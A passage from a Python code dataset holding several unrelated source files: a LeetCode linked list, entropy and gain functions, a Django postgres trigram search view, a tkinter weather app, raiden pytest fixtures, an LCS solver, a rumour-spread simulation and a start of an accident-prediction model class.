[1, 1000].\nPlease do not use the built-in LinkedList library.\n'''\n\nimport logging\nlogging.basicConfig(filename=\"test.log\", level=logging.DEBUG)\ndebug = logging.debug\n\n####################################################################################\nclass Node(object):\n def __init__(self, val=None):\n self.val = None\n self.next_node = None\n\n\ndef debug(arg):\n pass\n\n\nclass MyLinkedList(object):\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.head = Node()\n self.head.next_node = Node()\n\n\n def debug_whole_list(self):\n if not self.check_node_has_value(self.head):\n debug('No list to debug')\n return\n\n current_node = self.head\n\n list_to_debug = []\n\n while self.check_node_has_value(current_node):\n list_to_debug.append(current_node.val)\n current_node = current_node.next_node\n\n debug('{}'.format(list_to_debug))\n\n\n def print_whole_list(self):\n if not self.check_node_has_value(self.head):\n print('No list to print')\n return\n\n current_node = self.head\n\n list_to_print = []\n\n while self.check_node_has_value(current_node):\n list_to_print.append(current_node.val)\n current_node = current_node.next_node\n\n print('{}'.format(list_to_print))\n\n\n def return_whole_list(self):\n if not self.check_node_has_value(self.head):\n return('No list to print')\n return\n\n current_node = self.head\n\n list_to_return = []\n\n while self.check_node_has_value(current_node):\n list_to_return.append(current_node.val)\n current_node = current_node.next_node\n\n return list_to_return\n\n\n def check_node_has_value(self, node):\n \"\"\"\n Checks if a node exists and has a value\n deals with if the value is zero\n :param node: Node() \n :return: Boolean\n \"\"\"\n\n if node.val == 0:\n return True\n elif node.val == None:\n return False\n else:\n return True\n\n\n def create_new_node(self, val=None):\n self.new_node = Node()\n self.new_node.val = val\n self.new_node.next_node = Node()\n return self.new_node\n\n\n def get(self, index):\n \"\"\"\n Get the value of the index-th node in the linked list. If the index is\n invalid, return -1.\n :type index: int\n :rtype: int\n \"\"\"\n if not self.check_node_has_value(self.head):\n return -1\n\n self.current_node = self.head\n debug('---for loop in to get value at index about to begin---')\n\n for i in range(index):\n self.current_node = self.current_node.next_node\n if not self.check_node_has_value(self.current_node):\n return -1\n\n return self.current_node.val\n\n\n def addAtHead(self, val):\n \"\"\"\n Add a node of value val before the first element of the linked list.\n After the insertion, the new node will be the first node of the linked\n list.\n :type val: int\n :rtype: void\n \"\"\"\n\n new_node = Node()\n new_node.val = val# if val != 0 else 'zero'\n new_node.next_node = self.head\n self.head = new_node\n debug('addAtHead({})'.format(val))\n\n\n def traverse_to_tail(self):\n\n self.current_node = self.head\n\n while self.check_node_has_value(self.current_node.next_node):\n self.current_node = self.current_node.next_node\n\n return self.current_node\n\n\n def traverse_to_index(self, index):\n\n if not self.check_node_has_value(self.head)\\\n or not self.check_node_has_value(self.head.next_node):\n return self.head\n\n self.current_node = self.head\n for i in range(index-1):\n self.current_node = self.current_node.next_node\n if not self.check_node_has_value(self.current_node):\n return -1\n return self.current_node\n\n\n def addAtTail(self, val):\n \"\"\"\n Append a node of value val to the last element of the linked list.\n :type val: int\n :rtype: void\n \"\"\"\n\n if not self.check_node_has_value(self.head):\n self.head.val = val\n return\n\n self.new_node = self.create_new_node(val)\n self.current_node = self.traverse_to_tail()\n self.current_node.next_node = self.new_node\n\n\n def addAtIndex(self, index, val):\n \"\"\"\n Add a node of value val before the index-th node in the linked list. If index equals to the length of linked list, the node will be appended to the end of linked list. If index is greater than the length, the node will not be inserted.\n :type index: int\n :type val: int\n :rtype: void\n \"\"\"\n\n if index == 0:\n self.new_node = Node()\n self.new_node.val = val\n self.new_node.next_node = self.head\n self.head = self.new_node\n return\n\n # check if head of list has a value, exit function if not\n if not self.check_node_has_value(self.head):\n return\n\n # make new node\n self.new_node = self.create_new_node(val)\n\n # traverse list\n self.current_node = self.traverse_to_index(index)\n if self.current_node == -1:\n return\n else:\n if self.check_node_has_value(self.current_node.next_node):\n self.node_after = self.current_node.next_node\n self.current_node.next_node = self.new_node\n self.new_node.next_node = self.node_after\n else:\n self.current_node.next_node = self.new_node\n\n\n def deleteAtIndex(self, index):\n \"\"\"\n Delete the index-th node in the linked list, if the index is valid.\n :type index: int\n :rtype: void\n \"\"\"\n # check if head of list has a value, exit function if not\n if not self.check_node_has_value(self.head):\n return\n\n self.current_node = self.traverse_to_index(index)\n if self.current_node == -1:\n return\n\n if not self.check_node_has_value(self.current_node):\n return -1\n\n # check if the node after the one you want to delete exists\n if not self.check_node_has_value(self.current_node.next_node):\n # assign value of the current_node's next node to None, end function\n self.current_node.next_node = Node()\n debug('Breaking loop for deleteAtIndex as the index to be deleted was the final one')\n return\n\n # if node two places after exists assign it to current_node.next_node\n self.current_node.next_node = self.current_node.next_node.next_node\n\n debug('deleteAtIndex({})'.format(index))\n\n\n\n\n\n\n\n\n\n\n","sub_path":"leetcode_problems/completed/Design_Linked_List.py","file_name":"Design_Linked_List.py","file_ext":"py","file_size_in_byte":8541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"15038205","text":"from math import log\n\ndef calc_information(p, n):\n t = float(p+n)\n pt = p/t\n nt = n/t\n ip = -pt*log(pt, 2) if pt!=0 else 0.0\n it = -nt*log(nt, 2) if nt!=0 else 0.0\n return ip+it\n\ndef calc_entropy(t, l):\n entropy = 0.0\n for p, n in l:\n entropy += float(p+n)/t * calc_information(p, n)\n return entropy\n\ndef calc_gain(p, n, l):\n entropy = calc_entropy(p+n, l)\n information = calc_information(p, n)\n return information - entropy\n\ndef calc_gain_ratio(p, n, l):\n gain = calc_gain(p, n, l)\n t = float(p+n)\n splitInfo = 0.0\n for pi, ni in l:\n ti = (pi+ni)/t\n si = -ti*log(ti, 2)\n splitInfo += si\n return gain / splitInfo\n","sub_path":"DM/hw2/Information-gain-ration.py","file_name":"Information-gain-ration.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"19935336","text":"# Python code to demonstate String encoding\n\n### Encoding ####\n\n# initialisting a String\na = 'GeeksforGeeks'\n\n# initialisiting a byte object\nc = b'GeeksforGeeks'\n\nd = a.encode('ASCII')\n\nif (d==c) :\n\tprint (\"Encoding succesful\")\nelse : print (\"Encoding Unsuccessful\")\n\n### Decoding ###\n\na = \"GeeksforGeeks\"\n\nc = b'GeeksforGeeks'\n\nd = c.decode('ASCII')\n\nif(d==a):\n\tprint (\"Decoding successful\")\nelse: print (\"Decoding Unsuccessful\")","sub_path":"python/basic/variables/byte-object-vs-string.py","file_name":"byte-object-vs-string.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"638215414","text":"from django.shortcuts import render\n# postgres의 search기능을 사용하는데 필요한 모듈\nfrom django.contrib.postgres.search import SearchQuery, SearchVector, SearchRank, SearchHeadline\n# postgres의 Trigram Similarity 와 TrigramDistance 모듈\nfrom django.contrib.postgres.search import TrigramSimilarity, TrigramDistance\nfrom django.db.models import Count\n\nfrom book.forms import PostSearchForm\nfrom book.models import Book\n\n\ndef post_search(request):\n\n form = PostSearchForm\n results = []\n q = None\n\n # take the information from HTML, which is 'q' from form.\n if 'q' in request.GET:\n form = PostSearchForm(request.GET)\n if form.is_valid():\n q = form.cleaned_data['q']\n # print(q)\n\n # select ... from \"book_book\" where UPPER(\"book_book\".\"title\"::text)\n # LIKE UPPER(%%)\n\n \"\"\"\n 쿼리를 실행할 때. \n 1. 서버에 내가 어�� 데이터를 가져오려는 어떤 스크립트를 사용하여 \n\t\t SQL에 쿼리를 쓴다고(write) 가정한다.\n 2. 쿼리를 쓴 것을 바탕으로 우리가 요구한 데이터를 서버에서 모으는 방식은 \n 매우 다양하다. Query planner라는 매카니즘이 실행된다. 쿼리 플래너란 \n 우리의 쿼리에 실행되는 가장 빠른 방법을 찾는 메카니즘이다. \n 쿼리에 실행되는 방법들(plans)의 실행 시간(execution time)을 평가를 바탕으로 실행된다. \n 3. 실행시간이 가장 빠른 쿼리가 서버에서 실행된다.\n 4. 서버가 결과물을 출력한다. \n \n 실행시간(Execution time): 3과 4의 단계를 거친 시간을 말한다. \n 계획시간(Planning time): 2단계만을 말한다. \n \n # 쿼리의 실행시간, 계획시간을 분석한다.\n # print(Book.objects.filter(title__icontains=q).explain(analyze=True))\n \"\"\"\n\n\n \"\"\"\n # Standard textual queries (case sensitive)\n results = Book.objects.filter(title__contains=q)\n \n print(Book.objects.filter(title__contains=q).explain(verbose=True, analyze=True))\n print(Book.objects.filter(title__contains=q).query)\n \n\n \"\"\"\n\n\n # # SearchVector 사용하기 (복수의 필드를 검색한다)\n \n # # q가 가진 string 값을 바탕으로 title과 authors 필드에 있는 \n # # objects를 가져와라 + 임시적으로 추가한 search 필드에 title과 author를\n # # 저장한다.\n\n # results = Book.objects.annotate(search=SearchVector('title', 'authors'),).filter(search=q)\n\n # # 삼천포: annotate\n # # 가령 작가 이름를 기준으로, 작가가 집필한 책의 수를 알고 싶다면 annotate를 이렇게 사용한다.\n # results = Book.objects.values('authors').annotate(num_books=Count('title')).order_by('-num_books')\n # print(results)\n\n\n # # Search Rank 사용하기\n # # 얼마나 document가 query에 상대적인지 가중치를 부여하는것을 바탕으로\n # # 가장 높은 연관성을 가진 document를 찾을 때 사용한다.\n # vector = SearchVector('title')\n # query = SearchQuery(q)\n # results = Book.objects.annotate(rank=SearchRank(vector, query)).order_by('-rank')\n\n\n\n # 가중치 랭킹 (점수가 높을수록 중요도가 높음)\n # D-weight: 0.1, C:0.2, B:0.4, A:1.0\n # Harris가 검색되는 이유는 Author내의 'Harr' 또한 가중치에 적용되기 때문임\n\n # vector = SearchVector('title', weight='B') + SearchVector('authors', weight='A')\n # query = SearchQuery(q)\n\n # vector = SearchVector('title', weight='B') + SearchVector('authors', weight='B')\n # query = SearchQuery(q)\n #\n # results = Book.objects.annotate(rank=SearchRank(vector, query, cover_density=True)).order_by('-rank')\n\n\n # text-search에는 normalization이 사용되기도 한다.\n # 정규화란 표현이 다른 단어를 통합시켜 같은 단어로 만든다.\n\n \"\"\"\n Trigram 혹은 Trigraph 개념 \n 문자열로 부터 받은 3개의 연속된 문자열들의 그룹\n \n Trigram에서 두개의 문자열이 공유하는 트라이그램의 수를 바탕으로 \n 유사성을 측정한다.\n \n 예: Dog -> \"d\", \"do\", \"dog\", \"og\"\n \"\"\"\n\n print(q)\n \n # trigramSimilarity & trigramDistance 사용하기\n #results = Book.objects.annotate(similarity=TrigramSimilarity('title', q),).filter(similarity__gte=0.3).order_by('-similarity')\n #results = Book.objects.annotate(distance=TrigramDistance('title', q),).filter(distance__lte=0.8).order_by('distance')\n\n\n # Headline Search\n # query = SearchQuery(q)\n # vector = SearchVector('authors')\n # results = Book.objects.annotate(search=vector, headline=SearchHeadline('authors', query)).filter(search=query)\n\n # 결과 값에 나오는 authors의 값을 html의 span 클래스로 씌우기\n # results = Book.objects.annotate(search=vector, headline=SearchHeadline('authors', query, start_sel='', stop_sel='')).filter(search=query)\n\n\n\n print(\"#1\")\n print(Book.objects.filter(title__trigram_similar=q).explain(analyze=True))\n print(\"#2\")\n print(Book.objects.filter(\n title__trigram_similar=q).annotate(\n similar=TrigramSimilarity('title', q)).order_by('-similar').explain(analyze=True))\n\n return render(request, 'index.html', {'form':form, 'results':results, 'q':q})\n\n\"\"\" \nGIN 인덱스를 사용하지 않고 query 하는 경우\n\n# 1\nPlanning Time: 4.965 ms\nExecution Time: 128.473 ms\n\n#2\nPlanning Time: 2.511 ms\nExecution Time: 142.305 ms\n\n\nGIN 인덱스를 사용하는 경우\n\n#1\nPlanning Time: 3.680 ms\nExecution Time: 13.333 ms\n#2\n\nPlanning Time: 2.112 ms\nExecution Time: 15.078 ms\n\n\"\"\"","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"215581179","text":"from PIL import Image\r\nimport numpy as np\r\nW1=640\r\nH1=360\r\nW15=429\r\nH15=322\r\nW2=1280\r\nH2=720\r\n\r\npath=\"C:\\\\image\\\\\"\r\npref1=\"144\\\\\"\r\npref2=\"720\\\\\"\r\nsuff1=\".jpg\"\r\nsuff2=\".jpg\"\r\n\r\nimg_1=Image.open(path+pref1+str(\"0\")+suff1)\r\narray_1=np.array(img_1)[:, :]\r\narray_1=array_1.astype(np.float32)\r\nimg_1_720 = img_1.resize((W2, H2), Image.BILINEAR)\r\narray_1_720=np.array(img_1_720)[:, :]\r\narray_1_720=array_1_720.astype(np.float32)\r\nimg_2=Image.open(path+pref2+str(\"0\")+suff2)\r\narray_2=np.array(img_2)[:, :, 0:3]\r\narray_2=array_2.astype(np.float32)\r\nprint(array_1.shape)\r\na=0\r\nfor i in range(720):\r\n for j in range(1280):\r\n for k in range(3):\r\n a=a+(array_1_720[i][j][k]-array_2[i][j][k])*(array_1_720[i][j][k]-array_2[i][j][k])/(720*1280*3)\r\nprint(a)\r\n","sub_path":"Temp/기본 cost.py","file_name":"기본 cost.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"347799485","text":"import tkinter as tk\r\nimport requests\r\nhieght= 500\r\nwidth=600\r\nroot = tk.Tk()\r\n\r\ndef test_fun(entry):\r\n print(entry)\r\n\r\ndef fr(weather):\r\n try:\r\n name = weather['name']\r\n des = weather['weather'][0]['description']\r\n temp = weather['main']['temp']\r\n\r\n fs='City: %s \\nConditions: %s \\nTemp (C*): %s' % (name, des, temp)\r\n except Exception:\r\n fs=\"Location Not Found......\"\r\n\r\n return fs\r\n\r\ndef weather1(city):\r\n key='8f38c3036b95711787bb4fb29c1dde56'\r\n url='http://api.openweathermap.org/data/2.5/weather'\r\n p={'APPID': key, 'q': city, 'units': 'imperial'}\r\n r= requests.get(url, params=p)\r\n w=r.json()\r\n label['text'] = fr(w)\r\n print(w['name'])\r\n print(w['weather'][0]['description'])\r\n print(w['main']['temp'])\r\n\r\nlabel1 = tk.Label(root, text='Weather App', bg = 'white')\r\nlabel1.config(font=('avenir', 20))\r\n\r\ncanvas = tk.Canvas (root, height=hieght, width= width)\r\ncanvas.pack() \r\n\r\nframe = tk.Frame(root, bg='#000000', bd=2,)\r\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.1, anchor='n') \r\n# label1=label(root, text='Enter location',width=20,font=(\"bold\",20))\r\n# label1.place(x=80,y=52)\r\nbutton = tk.Button(frame, text=\"Fetch\", font=36, bg='#FF00FF',command=lambda: weather1(entry.get()))\r\nbutton.place(relx=0.7, relwidth=0.3, relheight=1) \r\n\r\nentry=tk.Entry(frame, font=30)\r\nentry.place(relwidth=0.69, relheight=1)\r\n\r\nframe2 = tk.Frame(root, bg='#000000', bd=2)\r\nframe2.place(relx=0.5, rely=0.25, relwidth=0.75, relheight=0.6, anchor='n')\r\n\r\nlabel=tk.Label(frame2, bg='#C0C0C0')\r\nlabel.place(relwidth=1, relheight=1)\r\n\r\nroot.mainloop()\r\n","sub_path":"MiniProject Task/2.weather app/weather_app.py","file_name":"weather_app.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"589058612","text":"import os\nfrom typing import List\n\nimport pytest\nfrom raiden_libs.contracts import ContractManager\nfrom web3 import Web3\nfrom web3.contract import get_event_data, Contract\n\nimport pathfinder\nfrom pathfinder.utils.types import Address\n\n\n@pytest.fixture(scope='session')\ndef contracts_path() -> str:\n module_dir = os.path.dirname(pathfinder.__file__)\n return os.path.join(module_dir, 'contract')\n\n\n@pytest.fixture(scope='session')\ndef contract_manager(contracts_path: str):\n return ContractManager(os.path.join(contracts_path, 'contracts_12032018.json'))\n\n\n@pytest.fixture(scope='session')\ndef token_addresses(\n web3: Web3,\n contract_manager: ContractManager\n) -> List[Address]:\n\n token = web3.eth.contract(\n abi=contract_manager.get_contract_abi('HumanStandardToken'),\n bytecode=contract_manager.get_contract_bytecode('HumanStandardToken'),\n )\n\n addresses = list()\n for i in range(4):\n tx_hash = token.deploy(args=(\n 1_000_000, # initial amount\n 18, # decimal units\n f'TestToken{i}', # Token name\n f'TT{i}', # Token symbol\n ))\n\n addresses.append(web3.eth.getTransactionReceipt(tx_hash).contractAddress)\n\n return addresses\n\n\n@pytest.fixture(scope='session')\ndef secret_registry_address(\n web3: Web3,\n contract_manager: ContractManager\n) -> Address:\n\n secret_registry = web3.eth.contract(\n abi=contract_manager.get_contract_abi('SecretRegistry'),\n bytecode=contract_manager.get_contract_bytecode('SecretRegistry')\n )\n\n tx_hash = secret_registry.deploy()\n return web3.eth.getTransactionReceipt(tx_hash).contractAddress\n\n\n@pytest.fixture(scope='session')\ndef token_network_addresses(\n web3: Web3,\n contract_manager: ContractManager,\n token_addresses: List[Address],\n secret_registry_address: Address,\n) -> List[Address]:\n\n token_network = web3.eth.contract(\n abi=contract_manager.get_contract_abi('TokenNetwork'),\n bytecode=contract_manager.get_contract_bytecode('TokenNetwork')\n )\n\n addresses = list()\n for token_address in token_addresses:\n tx_hash = token_network.deploy(args=(\n token_address,\n secret_registry_address,\n ))\n\n addresses.append(web3.eth.getTransactionReceipt(tx_hash).contractAddress)\n\n return addresses\n\n\n@pytest.fixture(scope='session')\ndef token_network_registry(\n web3: Web3,\n contract_manager: ContractManager,\n secret_registry_address: Address,\n) -> List[Address]:\n\n token_network_registry = web3.eth.contract(\n abi=contract_manager.get_contract_abi('TokenNetworkRegistry'),\n bytecode=contract_manager.get_contract_bytecode('TokenNetworkRegistry')\n )\n tx_hash = token_network_registry.deploy(args=(\n secret_registry_address,\n ))\n\n registry_address = web3.eth.getTransactionReceipt(tx_hash).contractAddress\n\n token_network_registry = web3.eth.contract(\n registry_address,\n abi=contract_manager.get_contract_abi('TokenNetworkRegistry'),\n )\n return token_network_registry\n\n\n@pytest.fixture(scope='session')\ndef token_network_addresses_from_registry(\n web3: Web3,\n contract_manager: ContractManager,\n token_network_registry: Contract,\n token_addresses: List[Address],\n) -> List[Address]:\n\n token_network_addresses = []\n\n for token_address in token_addresses:\n tx = token_network_registry.functions.createERC20TokenNetwork(token_address).transact()\n receipt = web3.eth.getTransactionReceipt(tx)\n\n event_data = get_event_data(\n contract_manager.get_event_abi('TokenNetworkRegistry', 'TokenNetworkCreated'),\n receipt['logs'][0]\n )\n token_network_address = event_data['args']['token_network_address']\n\n token_network_addresses.append(token_network_address)\n\n return token_network_addresses\n\n\n@pytest.fixture()\ndef token_network_contracts(\n web3: Web3,\n contract_manager: ContractManager,\n token_addresses: List[Address],\n token_network_addresses: List[Address],\n contracts_path: str,\n token_network_addresses_from_registry: List[Address],\n) -> List[Contract]:\n\n contracts = [\n web3.eth.contract(\n token_network_address,\n abi=contract_manager.get_contract_abi('TokenNetwork')\n )\n for token_network_address in token_network_addresses\n ]\n\n return contracts\n","sub_path":"pathfinder/tests/fixtures/contracts.py","file_name":"contracts.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"503087059","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 16 16:51:00 2017\r\n\r\n@author: r.dewinter\r\n\"\"\"\r\nimport numpy as np\r\n\r\ndef regpoly0(S):\r\n m,n = S.shape\r\n f = np.ones((m,1))\r\n df = np.zeros(n)\r\n return [f, df]","sub_path":"CEGO/regpoly0.py","file_name":"regpoly0.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"196761773","text":"# LCS, 最长公共子串\n# author: kurumi\n# date:2019.08.13\nclass Solution:\n def lcs(self, s1, s2):\n dp = [[0 for j in range(len(s1) + 1)] for i in range(len(s2) + 1)]\n for i in range(1, len(s2) + 1):\n for j in range(1, len(s1) + 1):\n if s1[j - 1] == s2[i - 1]:\n dp[i][j] = dp[i - 1][j - 1] + 1\n else:\n dp[i][j] = max([dp[i - 1][j], dp[i][j - 1]])\n for i, v in enumerate(dp):\n print(v)\n print(\"lcs len is: \", dp[len(s2)][len(s1)])\n\n\nif __name__ == \"__main__\":\n s1 = input()\n s2 = input()\n sol = Solution()\n sol.lcs(s1, s2)\n\n# 状态转移公式: dp[i][j] = dp[i-1][j-1] + 1 #当a[i] == b[j]\n# ########## = max([dp[i-1][j], dp[i][j-1]]) #当a[i] != b[j]\n","sub_path":"dynamic/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"604251289","text":"import networkx as nx\nimport sys\nimport csv\nimport random\nimport sys\nimport csv\nimport operator\n\n\ndef spreadrumour(g,beta,seeds, outputFile):\n\n #Read the file into a graph\n G = g\n\n #Find the total number of nodes\n\n\n #Mark 5 nodes as infected\n numberOfNodesToInfect = seeds\n\n b = beta\n\n\n\n I = numberOfNodesToInfect #we seed the outbreak with one infectious individual\n S = 0 #this is the number of susceptibles\n\n\n #Now we're going to set the simulation clock to zero.\n t = 0\n\n susceptible = {}\n infected ={}\n newlyInfected = []\n\n print(numberOfNodesToInfect)\n\n bip=nx.get_node_attributes(g,'bipartite')\n\n #Infect some nodes at random\n count = 0\n for i in range(0,numberOfNodesToInfect):\n node = random.choice(G.nodes()) #assuming no same nodes are picked in choice\n if(bip[node] == 0):\n infected[node] = node\n\n\n sList = [] #we'll keep the number of susceptible individuals at each step on this list\n iList = [] #the number of infected individuals here\n #rList = [] #the number who have recovered here\n\n S = len(susceptible)\n I = len(infected)\n\n\n sList.append(S)\n iList.append(I)\n #rList.append(R)\n\n print(infected)\n print(S)\n print(I)\n\n infectedCircles = {}\n\n while I > 0:\n newlyInfected = {}\n\n\n #Find the susceptibles\n susceptible={}\n #Find the newly infected circles\n newlyInfectedCircles = {}\n for node in infected:\n neighbours = G.neighbors(node)\n for neighbour in neighbours:\n if(bip[neighbour] == 1):\n if (neighbour not in newlyInfectedCircles) and (neighbour not in infectedCircles) :\n newlyInfectedCircles[neighbour] = neighbour\n\n #Now the susceptibles are spreading through the circles.\n for newlyInfectedCircle in infectedCircles:\n for neighbor in G.neighbors(newlyInfectedCircle):\n if(bip[neighbor] == 0) and (neighbor not in susceptible) and (neighbor not in infected):\n susceptible[neighbor] = neighbor\n\n\n\n\n S = len(susceptible)\n I = len(infected)\n\n print('------------------------Start with new susceptibles - Begin ---------------')\n print(S)\n print(I)\n print('------------------------Start with new susceptibles - - End---------------')\n\n #NEW PEOPLE ARE GETTING INFECTED\n newlyInfected = {}\n infected_num= int(round(b*len(susceptible)))\n print('Infecting ', infected_num ,'people now.')\n for i in range(0,infected_num):\n node=random.sample(susceptible,1)\n newlyInfected[node[0]] = node[0]\n del susceptible[node[0]]\n\n\n for i in newlyInfected:\n infected[i] = i\n\n for newlyInfectedCircle in newlyInfectedCircles:\n infectedCircles[newlyInfectedCircle] = newlyInfectedCircle\n\n S = len(susceptible)\n I = len(infected)\n #R = len(immune)\n\n #Then we add these values to their respective lists\n sList.append(S)\n iList.append(I)\n #rList.append(R)\n\n\n #This prints the time to standard out - usually the terminal you're running from -\n # and increments the timestep.\n t += 1\n if(t > 100):\n break\n\n\n w = csv.writer(open(outputFile, \"wb\"))\n for sus, inf in zip(sList, iList):\n w.writerow([sus, inf])\n\n","sub_path":"SIsimulation.py","file_name":"SIsimulation.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"175020517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 20 11:32:11 2020\n\n@author: aboutet\n\"\"\"\n\nimport os\nimport sys\nimport warnings\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\n \n# Modules personnels\nimport ml_utils\nimport plot\nfrom variables import *\n\n# Modules Python\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Librairies d'apprentissage automatique\nfrom sklearn import tree, ensemble, metrics, model_selection\nfrom sklearn.preprocessing import scale, StandardScaler\nfrom sklearn.tree import export_graphviz\nfrom sklearn.externals.six import StringIO \nfrom sklearn.metrics import make_scorer\nfrom sklearn.metrics import roc_curve, auc, roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cluster import KMeans\nimport pickle\n\ndef training_materiel(es, dataM):\n FEATURES_HERE_QUALI_NO_ORDER = [\"PRIORITYRD\",\"AR_AUTO\",\"AR_BUS\",\"AR_TAXIS\",\"AR_CARPOOL\",\"AR_PEDEST\",\"AR_TRUCKS\",\"AR_TRAFF\",\"AR_DELIV\",\"AR_EMERVEH\",\"AR_MOTOR\",\n \"PAVED\",\"PRIVATE\",\"FRONTAGE\",\"BRIDGE\",\"TUNNEL\",\"RAMP\",\"TOLLWAY\",\"POIACCESS\",\"CONTRACC\",\"ROUNDABOUT\",\"INTERINTER\"]\n FEATURES_HERE_QUALI_ORDERED = [\"SPEED_CAT\",\"FUNC_CLASS\"]\n FEATURES_HERE_QUANTI = [\"N_SHAPEPNT\"]\n\n # MISE A JOUR de la liste des variables après preprocessing\n FEATURES_HERE_QUALI_NO_ORDER = FEATURES_HERE_QUALI_NO_ORDER + [ADJ_SUP, ADJ_INF] + [CONTIENT_INTERSECTION] + [CORINE]\n FEATURES_HERE_QUANTI = FEATURES_HERE_QUANTI + [WAZE_TOTAL, WAZE_ACCIDENT, WAZE_JAM, WAZE_CLOSED, WAZE_WEATHER, WAZE_HAZARD] + ALERTES_COYOTE + [TOTAL_COYOTE] + [TRAFIC]\n \n # Gardées après séléction phase 1 - CAS SANS ALERTES TEMPORELLES\n aggregation = {TRAFIC:'mean',WAZE_TOTAL:'mean', \"N_SHAPEPNT\":'mean',WAZE_JAM:'mean', WAZE_HAZARD:'mean',TOTAL_COYOTE:'mean'}\n QUANTI_KEEP = list(aggregation.keys())\n QUALI_ORDERED_KEEP = [\"FUNC_CLASS\",\"SPEED_CAT\"]\n QUALI_NOORDER_KEEP = [CORINE, 'PAVED', 'PRIVATE', 'PRIORITYRD']\n \n QUANTI_KEEP = QUANTI_KEEP + METEO_QUANTI\n QUALI_ORDERED_KEEP = QUALI_ORDERED_KEEP\n QUALI_NOORDER_KEEP = QUALI_NOORDER_KEEP + [INFO_JOUR,JOUR_SEMAINE, MOIS, CRENEAU]\n \n dataM[CLASSES_SIMPLES] = [0 if ac > 0 else 1 for ac in dataM[ID_ACC]]\n\n baro = barometre_accidents_materiels(dataM, QUANTI_KEEP, QUALI_NOORDER_KEEP, QUALI_ORDERED_KEEP, split = 'raffinement_speeds')\n\n baro.fit(print_results = True)\n\n path = 'training/Barometre_materiel.pkl'\n baro.save(path)\n\n return baro\n\nclass barometre_accidents_materiels():\n \n def __init__(self, data, quantis, qualiNoOrder, qualiOrder, split = 'speed'):\n '''\n Constructor\n '''\n \n # Constantes\n self.nTrees = 200\n self.maxDepth = 100\n self.maxLeaves = 100\n self.verbose = 1\n \n self.positive_class = 0\n \n # Constantes pour le raffinement du split\n self.speeds_change = [4,6,5,7]\n self.K = 3\n self.cols_change = [COURBURE, TRAFIC, TOTAL_COYOTE]\n self.corresp_clusters = dict()\n \n # Attributs passés\n self.quantis = quantis\n self.qualiNoOrder = qualiNoOrder\n self.qualiOrder = qualiOrder\n \n self.keys = None\n self.split = split\n if self.split == 'speed':\n self.split_function = self.split_speed\n if self.split == 'raffinement_speeds':\n self.KMeans = None\n self.split_function = self.split_raffinement\n \n \n # Données d'entrainement: déterminent d'entrée la structure des modèles dans le constructeur\n self.data = data\n self.data[CLASSES_SIMPLES] = [0 if ac > 0 else 1 for ac in self.data[ID_ACC]]\n self.target = self.data[CLASSES_SIMPLES]\n self.datas = self.split_function(self.data, first_time = True)\n # Mise à jour des clés\n self.keys = list(self.datas.keys()) \n \n self.weights = [len(self.datas[key]) for key in self.keys]\n \n # Formattage pour l'apprentissage\n self.scaler_quanti = {key: StandardScaler(with_mean = True, with_std = True) for key in self.keys}\n self.scaler_qualiOrder = {key: StandardScaler(with_mean = True, with_std = True) for key in self.keys}\n self.trains, self.targets = self.preprocessing_learning()\n self.cols = self.ref_columns() # Learning and prediction will be done on sorted union of columns (reference to avoid errors)\n \n # Modele \n self.rf = {key: ensemble.RandomForestClassifier(class_weight = 'balanced', n_estimators = self.nTrees, max_features = None, max_depth = self.maxDepth, max_leaf_nodes = self.maxLeaves, \n min_samples_leaf = 5, min_samples_split = 2, verbose = self.verbose) for key in self.keys}\n self.importance = None\n \n \n ## Split Functions that may vary\n def split_Kmeans(self, plot = False):\n return 0\n \n def split_speed(self, data, plot = True, first_time = True):\n datas = dict()\n data = data.reset_index(drop = True)\n speeds = list(data[SPEED].unique())\n for key in speeds:\n datas[key] = data[data[SPEED]==key]\n return datas\n \n def split_raffinement(self, data, first_time = True, plot = False):\n datas = dict()\n data = data.reset_index(drop = True)\n speeds = list(data[SPEED].unique())\n for key in speeds:\n datas[key] = data[data[SPEED]==key]\n \n # Raffinement sur les vitesses contenues dans self.speeds_change\n for oldKey in self.speeds_change:\n # Récupération ancienne data et bonnes colonnes\n data_ = datas[oldKey][[AGREGATS]+self.cols_change]\n \n # Scale et KMeans, récupération colonne Cluster dans datas[key]\n data_[self.cols_change] = scale(data_[self.cols_change])\n data_ = data_[[AGREGATS]+self.cols_change].drop_duplicates(keep = 'first')\n \n if first_time:\n # La première fois, on entraine un Kmeans\n self.KMeans = KMeans(self.K)\n self.KMeans.fit(data_[self.cols_change])\n data_['Clusters'] = self.KMeans.labels_\n 